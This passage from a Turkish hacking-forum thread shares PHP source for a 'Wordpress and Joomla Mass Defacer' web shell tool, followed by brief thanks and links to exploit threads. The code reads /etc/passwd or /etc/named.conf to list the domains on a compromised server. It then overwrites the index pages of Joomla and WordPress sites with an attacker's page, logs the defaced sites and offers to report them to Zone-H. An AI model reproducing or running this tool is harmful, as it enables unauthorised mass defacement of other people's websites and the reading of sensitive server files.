echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
        }
    }
    echo '</table>';
    echo '<hr/>';
    echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
    echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if($count1+$count2 > 0){
        echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}
echo '<!DOCTYPE html>
<html>
<head>
<title>Joomla ~ Wordpress Mass Defacer</title>
<link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
<style type="text/css">
table,body {
background:
url("https://d33ds.co/img/bg3.png") repeat ,
url("https://d33ds.co/img/bglight.png") no-repeat center top,top left,top right,
url("https://d33ds.co/img/bg2.png") repeat top left;
background-color: #ffffff;
color:white;
font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
.header {position:fixed;width:100%;top:0;background:#000;}
.footer {position:fixed;width:100%;bottom:0;background:#000;}
input[type="submit"]{background-color:rgba(25,25,25,0.6);border:1; padding:2px; border-bottom:2px solid white; font-size:25px;font-family:orbitron; color:red;border:2px solid white;margin:4px 4px 8px 0;}
input[type="submit"]:hover{color:SeaShell;}
input[type="text"]:hover{color:SeaShell;}
input[type="radio"]{margin-top: 0;}
.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}
input[type="text"] {background:#111111; border:1; padding:2px; border-bottom:2px solid #393939;font-family:orbitron; font-size:25px; color:#ffffff;border:2px solid #4C83AF;margin:4px 4px 8px 0;}
.even {background-color: rgba(25, 25, 25, 0.6);}
.odd {background-color: rgba(102, 102, 102, 0.6);}
a {color:#fff;} a:hover {color:#00BFFF;}
fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
textarea{background: rgba(0,0,0,0.6); color: white;}
.green {color:#00FF00;font-weight:bold;}
.red {color:#FF0000;font-weight:bold;}
.killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
</style>
<script type="text/javascript">
function change() {
if(document.getElementById(\'rcd\').checked == true) {
document.getElementById(\'tra\').style.display = \'\';
} else {
document.getElementById(\'tra\').style.display = \'none\';
}
        }
        function hide() {
document.getElementById(\'tra\').style.display = \'none\';
        }
    </script>
</head>
<body>
<div class="footer">
<h3 style="text-align: center;">&copy; K2ll33d&nbsp;&nbsp;<a href="http://facebook.com/k2ll33d" target="_blank"><img src="https://fbstatic-a.akamaihd.net/rsrc.php/yP/r/Ivn-CVe5TGK.ico" width=30></a></h3>
</div>
<h2 style="color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';
if(!isset($_POST['form_action']) && !isset($_GET['zh']) && !isset($_GET['mode']) && !isset($_GET['kill'])){
echo '<div align="center">
<form action="" method="post">
<table>
<tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr>
<tr id="tra" style="display: none;"><td></td><td><textarea cols="40" rows="5" name="man_data"></textarea></td></tr>
</table>
<br />
<input type="hidden" name="form_action" value="1">
<table>
<tr><td><b>index url: </b><input size="35" type="text" name="defpage" value=""></tr></td>
</table>
<input class=submit type="submit" value="Attack !" name="Submit">
</form>';
    }
$milaf_el_index = $_POST['defpage'];
    if($_POST['form_action'] == 1) {
if($_POST['mode']==1) { exec_mode_1($milaf_el_index, $hacker); }
if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }
if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }
    }
    if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }
    echo '</body>
</html>';
www.deccal.org


Beğenenler:
#2
eline sağlık.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Wordpress "Js Support Ticket" File Upload Bypass Extensions Mr.F92 16 522 1 saat önce
Son Yorum: Slowycan
  Joomla Com_Cckjseblod Auto Exploiter FTP Config İndirme Exploit KingSkrupellos 12 220 01-12-2016, Saat: 08:35
Son Yorum: the_zizil
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 10 164 27-11-2016, Saat: 11:37
Son Yorum: R3D
  WordPress store theme Upload Acıgı archavin 72 4,747 24-11-2016, Saat: 17:33
Son Yorum: Mrxxx
  WordPress TheCotton Teması Uzaktan Dosya Yükleme Açığı KingSkrupellos 5 73 23-11-2016, Saat: 22:29
Son Yorum: VictoryPeke
Anahtar Kelimeler

Joomla ve WordPress Shelli indir, Joomla ve WordPress Shelli Videosu, Joomla ve WordPress Shelli Online izle, Joomla ve WordPress Shelli Bedava indir, Joomla ve WordPress Shelli Yükle, Joomla ve WordPress Shelli Hakkında, Joomla ve WordPress Shelli Nedir, Joomla ve WordPress Shelli Free indir, Joomla ve WordPress Shelli Oyunu, Joomla ve WordPress Shelli Download


1 Ziyaretçi